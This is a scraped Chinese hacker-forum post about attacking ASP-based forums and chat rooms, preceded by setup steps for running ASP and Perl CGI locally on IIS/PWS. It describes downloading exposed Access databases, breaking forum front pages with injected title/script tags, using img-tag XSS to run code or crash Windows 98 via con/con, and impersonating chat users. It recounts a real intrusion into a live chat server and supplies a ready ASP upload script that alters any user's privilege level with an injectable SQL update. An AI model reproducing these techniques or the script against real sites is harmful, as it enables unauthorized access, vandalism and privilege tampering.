| 这一节我们来稍微了解一下服务器端的脚本程序攻击.由于对服务器端脚本程序我只会一点asp,我的重点也放在这.asp也是我努力的一方向,真想自己写一个论坛,可一直没有太多时间,(不是没时间写,而是没时间学呀,哈哈).
要做好一个主页,单靠html和js是不够的,来点酷的就要接触一些服务端程序,像asp和cgi.php.jsp等。如何快速入门?你要从头编写程序吗?其实网上免费脚本很多啊,我们要拿来用即可!但是阻碍菜鸟的就是如何调试这些程序。看完这篇文章,我估计你已经可以在支持cgi和asp空间上安装程序了,有了自己的论坛和江湖。想研究入侵江湖和聊天室的数据库,想从源码漏洞下手,这更是第一步。在win98和windows2000下安装单机调试asp和cgi的iss环境,其实是很简单的。至于让win2000支持apache和php,请看我的另一部电子书.下载1. 安装 Perl 解释器?
Perl 是一种解释执行的语言,所以,要单机运行调试 Perl CGI ,必须先安装 Perl 解释器。
首先下载 Active Perl 5.6.1(华军软件园有,大约8mb),一般文件名是 APi5XXe.exe,其中 XX 是版本号。然后运行此程序,默认是安装在 C:\PERL 下,不过为了方便,请最好安装到 C:\USR 目录下,这样写 Perl 解释器的路径就可以直接用 #!/usr/bin/perl 了,可以保持单机环境和网络环境路径一致。2. 安装 WEB 服务器?
有些网友认为安装了 Perl 解释器后就可通过双击文件运行,这是错误的,因为 Perl 是脚本文件,它只能在浏览器内调用,所以必须安装 WEB 服务器软件。现在 WINDOWS 95/98 下最常用的 WEB 服务器我想是Personal Web Server(PWS)。这个软件在win98光盘里有。点win98光盘目录add-one进入setup即可完成pws安装。其实只要安装pws,asp即可以支持。你点文件夹属性web共享(安装完pws即有这项。windows2000下是安装光盘上的iis5.0)设一个别名或什么也不用改动,然后在ie中运行http://127.0.0.1/web共享文件夹/*.asp,就可以看到你的劳动成果asp程序运行了。要支持cgi,还要做一些手脚,按照下面二步来修改注册表(win98.2000完全一样):
① 运行 RegEdit,搜寻: HKEY_LOCAL_MACHINE\System\Currentcontrlset\Services\W3svc\
Parameters\ScriptMap\ 键名
② 然后增加键名:.cgi,键值:C:\USR\BIN\perl.exe %s %s 和键名:.pl,键值:C:\USR\BIN\perl.exe %s %s注册表改完后,你去控制面板点管理工具里的Internet 信息服务,点默认的WEB站点,按右键,点属性.
找到主目录菜单,点应用程序设置右边的 配置 找到主目录菜单,点应用程序设置右边的 配置
点添加-出现 添加/编辑应用程序扩展名映射的对话框。
在可执行文件里写上C:\usr\bin\perl.exe %s %s扩展名写上 .cgi 不要忘记有个点的。下面还要勾上--脚本引擎同理,加上C:\usr\bin\perl.exe %s %s
扩展名是 .pl确定后,接着点菜单的ISAPI 筛选器,点添加,
在筛选器名称 里写 cgi
可执行文件里写 c:\usr\bin\perlis.dll
在本机上调试cgi,要将cgi文件copy到web共享目录下。然后在ie中运行http://127.0.0.1/web共享文件夹/*.cgi,程序运行了吧?哈哈。127.0.0.1可以改为你的机器名。
3、关于文件上传。asp你只要传到支持asp的空间上就可以运行了。cgi就令人讨厌了,有的空间商要求你将文件属性设为777,755等,如何改呢?我查了不少资料才明白的。我也是个菜鸟。论坛上有人回复说chmod+777+filename即可改,可是在windows下行不通。原来是在ftp软件里改。我推荐你用flashfxp。在上传的文件点鼠标右键-chmod你就可以改了。原来我用cutepage网页工具里自带的ftp,里边没有这项,他妈妈的,害我上网逛了好几天,网费......说半天没说到如何入侵。我这里只谈asp.asp入侵最简单的方法其实就是希望看到源代码,找到数据库的位置。这里给菜鸟解说一下,你通过查看网页源代码看到的是asp程序在服务器端过滤asp码后送到客户端的html码.一般情况下asp每个文件顶头都有一行像这样子。其中dbfunc.asp这个文件就是数据库连接文件,当然它不一定是dbfunc,也可能是其它名字。然后再查找dbfunc.asp,找到"Connstr="DRIVER={Microsoft Access Driver (*.mdb)};DBQ="+server.mappath("gg.mdb")+"这样的语句,你就清楚原来数据库的名字是gg.mdb,即可通过http://*.*.*/*/gg.mdb这样方式下载!用acess2000打开就会看到用户名和密码.但如何查看源码,这就要利用到asp程序的一些漏洞了.这里我做了一个小网页,可以简单查看asp源码泄露漏洞.源码查看器,你也可以用一些扫描软件扫到.但是现在像这样的漏洞几乎是没有了,即使你能看到源码,程序编写着也不会让数据库是*.mdb格式了,都被人黑怕了呀.即使能下到mdb,恐怕数据库的密码也是采用了md5加密,至于怎样才能找到脚本程序的漏洞呢?这就要求我们努力学习编程了.这样说太抽像了,还是举两个例子第一个是我对论坛的一点小研究
首先是对论坛首页的破坏。我在本机(win2000+isss5.0)上对动网论坛3.0和极限论坛5.0做过测试并成功。(这两个版本我很早就下了,其它版本和其它asp论坛我想有的程序也应该存在同样问题)。这个破坏方法的原理在我以前写过一篇文章<<弹出式域名的深入研究>>中详细讲过,具体内容你可看这里:http://www.521hacker.com/article/show.php?id=1670 。说得是怎样利用html的标签去掉网易域名广告。现在我们在论坛上利用<title>为用户名注册,注册后你会发现整个论坛首页无法显示。使首页无法显示的同样的破坏标签还有<style>和<script>,用<head>注册则自己的用户名无法正常显示。其它的html标签我没试验过。如果部份论坛注册后可以正常显示首页,你再用这个用户名发一个贴子再回复一个贴子,贴子的内容仍然是这几个破坏性标签,则论坛就无法正常显示了。再一个是对论坛贴子的破坏。许多asp论坛没有禁止贴图标签。你可以在<img src="http://和" onload="thumbImg(this)" alt="" />中书写任意js代码。像写一个<img src="http://javascript:alert(\"弹出对话框\")" onload="thumbImg(this)" alt="" />,则一打开本贴就可以弹出 一个对话框。如果你在其中写self.open(file:///c:/con/con)呢?那么谁打开该贴没打补丁的win98就死机。由于本方法极具破坏作用,且方法简单实用性强,请只可在本机上试验,不要对国内论坛进行破坏。
第二个就是聊天室了
我研究的是传说水吧,最流行的聊天室。它对注册用户名要求得很严格,我们只好另寻破坏方法。经我测试3.0以下版本在呼叫中存在<html>语句漏洞,你可以在呼叫中直接发送html语句。除了这个,我再没找到其它漏洞。但是无论哪一个版本它都有一个小bug呀,可以冒充别人对你说话。找到一个mm,想让她对你说我爱你,她不愿意呀。没关系,跟我来。水吧的动作是样表示的://##对%%说,##代表自己,%%代表对方。先点mm名单,然后你在发言区输入//%%对##说我爱你,那么这个妹妹和你的屏幕上就会出现妹妹对你说我爱你的话了。另一个是如果你能下到传说水吧的数据库的话,我这有一个解密数据库用户密码的小脚本http://freehost12.websamba.com/lunta/sb.asp(对3.0以下版本有效)虽然传说水吧作者说它的加密是不可逆的。说了半天, 你好心急了,说我想看入侵办法呀.正好,我有一次还应mm要求入侵过一家传说水吧,通过服务器漏洞,进入了主机.这家传说水吧人气极旺,数据库有40mb,我小猫上网,无法下载,但我们可以上传呀.我就上传了一个小脚本,修改了mm的级别. 从这一点上也能看出,要想研究脚本攻防,你总要稍微学习一点编程技术.为照顾菜鸟,如果你也恰好有一个传说水吧的话,可以用下面这个脚本不进聊天室就可以修改自己的级别,保存成conpag.asp,传到水吧的主目录下就行.
<HTML>
<BODY>
<form NAME="Users" action = "conpag.asp" method="POST">
<Input TYPE="TEXT" NAME="u" size ="15" value="姓名">
<Input TYPE="TEXT" NAME="j" size ="5" value="级别">
<input TYPE="SUBMIT" name="submit" value="修改">
</form>
</BODY>
</HTML>
<%
dim a
a =trim(request.form("u"))
b =trim(request.form("j"))
if request.form("submit") = "修改" then
Set Conn = Server.Createobject("ADODB.Connection")
Conn.Open "DRIVER={Microsoft Access Driver (*.mdb)};DBQ="+server.mappath("db\global.asa")
strsql= "update user set user_level='"&b&"'where username='" & a&"'"
Set objRS = Conn.Execute(strSQL)
set objrs=nothing
Conn.Close
Set Conn = Nothing
End if
%>
当然,数据库入侵的办法还有很多.更清楚的就是要努力提高我们的脚本技术因为cgi本人不懂,所以没有讲解。以后补充。</td></tr></table>
</div>
<div id="post_rate_div_241338"></div>
<div class="useraction">
<a href="javascript:;" onclick="showDialog($('favoritewin').innerHTML, 'info', '收藏/关注')">收藏</a>
<a href="javascript:;" id="share" onclick="showDialog($('sharewin').innerHTML, 'info', '分享')">分享</a>
</div>
</div>
</div>
</td></tr>
<tr><td class="postcontent postbottom">
<div id="ad_thread1_0"></div></td>
</tr>
<tr>
<td class="postauthor"></td>
<td class="postcontent">
<div class="postactions">
<div class="postact s_clear">
<em>
</em>
<p>
</p>
</div>
</div>
</td>
</tr>
<tr class="threadad">
<td class="postauthor"></td>
<td class="adcontent">
</td>
</tr>
</table>
</div></div>
<div id="postlistreply" class="mainbox viewthread"><div id="post_new" class="viewthread_table" style="display: none"></div></div>
<form method="post" name="modactions" id="modactions">
<input type="hidden" name="formhash" value="b2c8c677" />
<input type="hidden" name="optgroup" />
<input type="hidden" name="operation" />
<input type="hidden" name="listextra" value="" />
</form>
<script type="text/javascript">var tagarray = ['软件','手机','免费','南京智浩科技','机房报警','正版','珠江','南京','电脑','二手笔记本','南京二手笔记本','陈德志','二手笔记本批发','模块','批发出售','电脑配件','二手IBM','温度报警','教程','浩浩','IBM','论坛','朋友','支付宝','神马','歌曲','路全新','网络安全','原创歌手','MP3','托盘','宴会','分量','带宽分配','杯子','果汁','妓女','远程维护','系统安全','销售管理','蓝牙','四川旅游','ATI','歌手','网络客户','保密','检查','取证','工具','电脑软件','环境监控','交换机','诺基亚','多普达','时尚','三星','正品','三星W629','AMD','伯爵','行为管理','数码相机','空调启动切换器','空调控制器','空调启动器','空调启动切换控制器','宝贝','IBM批发','东莞','发网','批发价格','GSM机房环境监控','机房环境监控','推荐','帮忙','垃圾邮件','网络ghost','网络克隆','梭子鱼','杀毒','硬盘克隆','ibmpifa','台式','铭瑄','ISO27001','笔记本','性价比','国庆','出货','戴尔','电脑报价','出售','亏本','南京二手电脑','你来啦','即时通讯','风险管理','咨询','信息安全','清扬'];var tagencarray = ['%C8%ED%BC%FE','%CA%D6%BB%FA','%C3%E2%B7%D1','%C4%CF%BE%A9%D6%C7%BA%C6%BF%C6%BC%BC','%BB%FA%B7%BF%B1%A8%BE%AF','%D5%FD%B0%E6','%D6%E9%BD%AD','%C4%CF%BE%A9','%B5%E7%C4%D4','%B6%FE%CA%D6%B1%CA%BC%C7%B1%BE','%C4%CF%BE%A9%B6%FE%CA%D6%B1%CA%BC%C7%B1%BE','%B3%C2%B5%C2%D6%BE','%B6%FE%CA%D6%B1%CA%BC%C7%B1%BE%C5%FA%B7%A2','%C4%A3%BF%E9','%C5%FA%B7%A2%B3%F6%CA%DB','%B5%E7%C4%D4%C5%E4%BC%FE','%B6%FE%CA%D6IBM','%CE%C2%B6%C8%B1%A8%BE%AF','%BD%CC%B3%CC','%BA%C6%BA%C6','IBM','%C2%DB%CC%B3','%C5%F3%D3%D1','%D6%A7%B8%B6%B1%A6','%C9%F1%C2%ED','%B8%E8%C7%FA','%C2%B7%C8%AB%D0%C2','%CD%F8%C2%E7%B0%B2%C8%AB','%D4%AD%B4%B4%B8%E8%CA%D6','MP3','%CD%D0%C5%CC','%D1%E7%BB%E1','%B7%D6%C1%BF','%B4%F8%BF%ED%B7%D6%C5%E4','%B1%AD%D7%D3','%B9%FB%D6%AD','%BC%CB%C5%AE','%D4%B6%B3%CC%CE%AC%BB%A4','%CF%B5%CD%B3%B0%B2%C8%AB','%CF%FA%CA%DB%B9%DC%C0%ED','%C0%B6%D1%C0','%CB%C4%B4%A8%C2%C3%D3%CE','ATI','%B8%E8%CA%D6','%CD%F8%C2%E7%BF%CD%BB%A7','%B1%A3%C3%DC','%BC%EC%B2%E9','%C8%A1%D6%A4','%B9%A4%BE%DF','%B5%E7%C4%D4%C8%ED%BC%FE','%BB%B7%BE%B3%BC%E0%BF%D8','%BD%BB%BB%BB%BB%FA','%C5%B5%BB%F9%D1%C7','%B6%E0%C6%D5%B4%EF','%CA%B1%C9%D0','%C8%FD%D0%C7','%D5%FD%C6%B7','%C8%FD%D0%C7W629','AMD','%B2%AE%BE%F4','%D0%D0%CE%AA%B9%DC%C0%ED','%CA%FD%C2%EB%CF%E0%BB%FA','%BF%D5%B5%F7%C6%F4%B6%AF%C7%D0%BB%BB%C6%F7','%BF%D5%B5%F7%BF%D8%D6%C6%C6%F7','%BF%D5%B5%F7%C6%F4%B6%AF%C6%F7','%BF%D5%B5%F7%C6%F4%B6%AF%C7%D0%BB%BB%BF%D8%D6%C6%C6%F7','%B1%A6%B1%B4','IBM%C5%FA%B7%A2','%B6%AB%DD%B8','%B7%A2%CD%F8','%C5%FA%B7%A2%BC%DB%B8%F1','GSM%BB%FA%B7%BF%BB%B7%BE%B3%BC%E0%BF%D8','%BB%FA%B7%BF%BB%B7%BE%B3%BC%E0%BF%D8','%CD%C6%BC%F6','%B0%EF%C3%A6','%C0%AC%BB%F8%D3%CA%BC%FE','%CD%F8%C2%E7ghost','%CD%F8%C2%E7%BF%CB%C2%A1','%CB%F3%D7%D3%D3%E3','%C9%B1%B6%BE','%D3%B2%C5%CC%BF%CB%C2%A1','ibmpifa','%CC%A8%CA%BD','%C3%FA%ACu','ISO27001','%B1%CA%BC%C7%B1%BE','%D0%D4%BC%DB%B1%C8','%B9%FA%C7%EC','%B3%F6%BB%F5','%B4%F7%B6%FB','%B5%E7%C4%D4%B1%A8%BC%DB','%B3%F6%CA%DB','%BF%F7%B1%BE','%C4%CF%BE%A9%B6%FE%CA%D6%B5%E7%C4%D4','%C4%E3%C0%B4%C0%B2','%BC%B4%CA%B1%CD%A8%D1%B6','%B7%E7%CF%D5%B9%DC%C0%ED','%D7%C9%D1%AF','%D0%C5%CF%A2%B0%B2%C8%AB','%C7%E5%D1%EF'];parsetag(241338);</script>
<div class="forumcontrol s_clear">
<table cellspacing="0" cellpadding="0" >
<tr>
<td class="modaction">
</td>
<td>
<span class="pageback"><a href="forumdisplay.php?fid=18">返回列表</a></span>
<span class="replybtn"><a href="post.php?action=reply&fid=18&tid=33103" onclick="showWindow('reply', this.href);return false;">回复</a></span>
<span class="postbtn" id="newspecialtmp" onmouseover="$('newspecial').id = 'newspecialtmp';this.id = 'newspecial';showMenu({'ctrlid':this.id})"><a href="post.php?action=newthread&fid=18" onclick="showWindow('newthread', this.href);return false;">发帖</a></span>
</td>
</tr>
</table>
</div>
<div class="popupmenu_popup" id="fjump_menu" style="display: none">
<dl><dt><a href="index.php?gid=270">使用交流</a></dt><dd><ul><li><a href="forumdisplay.php?fid=1">网络安全</a></li><li class="current"><a href="forumdisplay.php?fid=18">网络技术</a></li></ul></dd></dl><dl><dt><a href="index.php?gid=188">娱乐休闲</a></dt><dd><ul><li><a href="forumdisplay.php?fid=2">灌水乐园</a></li><li><a href="forumdisplay.php?fid=413">文学天地</a></li><li><a href="forumdisplay.php?fid=353">美图欣赏</a></li></ul></dd></dl><dl><dt><a href="index.php?gid=409">网站办公</a></dt><dd><ul><li><a href="forumdisplay.php?fid=14">站务处理</a></li></ul></dd></dl></div>
<div id="favoritewin" style="display: none">
<h5>
<a href="javascript:;" onclick="ajaxget('my.php?item=favorites&tid=33103', 'favorite_msg');return false;" class="lightlink">[收藏此主题]</a>
<a href="javascript:;" onclick="ajaxget('my.php?item=attention&action=add&tid=33103', 'favorite_msg');return false;" class="lightlink">[关注此主题的新回复]</a>
</h5>
<span id="favorite_msg"></span>
</div>
<div id="sharewin" style="display: none">
<h5>
<a href="javascript:;" onclick="setCopy('脚本程序攻击\nhttp://bbs.thysea.com/viewthread.php?tid=33103', '帖子地址已经复制到剪贴板<br />您可以用快捷键 Ctrl + V 粘贴到 QQ、MSN 里。')" class="lightlink" />[通过 QQ、MSN 分享给朋友]</a><br /><br />
</h5>
</div>
</div><div id="ad_footerbanner1"></div><div id="ad_footerbanner2"></div><div id="ad_footerbanner3"></div>
<div id="footer">
<div class="wrap s_clear">
<div id="footlink">
<p>
<strong><a href="http://www.thysea.com/" target="_blank">黑色海岸线</a></strong>
<span class="pipe">|</span><a href="mailto:support@microsoft.com">联系我们</a>
<span class="pipe">|</span><a href="stats.php">论坛统计</a><span class="pipe">|</span><a href="archiver/" target="_blank">Archiver</a></p>
<p class="smalltext">
GMT+8, 2025-1-12 18:40, <span id="debuginfo">Processed in 0.055020 second(s), 6 queries, Gzip enabled</span>.
</p>
</div>
<div id="rightinfo">
<p>Powered by <strong><a href="http://www.discuz.net" target="_blank">Discuz!</a></strong> <em>7.2</em></p>
<p class="smalltext">© 2001-2009 <a href="http://www.comsenz.com" target="_blank">Comsenz Inc.</a></p>
</div></div>
</div>
</body>
</html> |
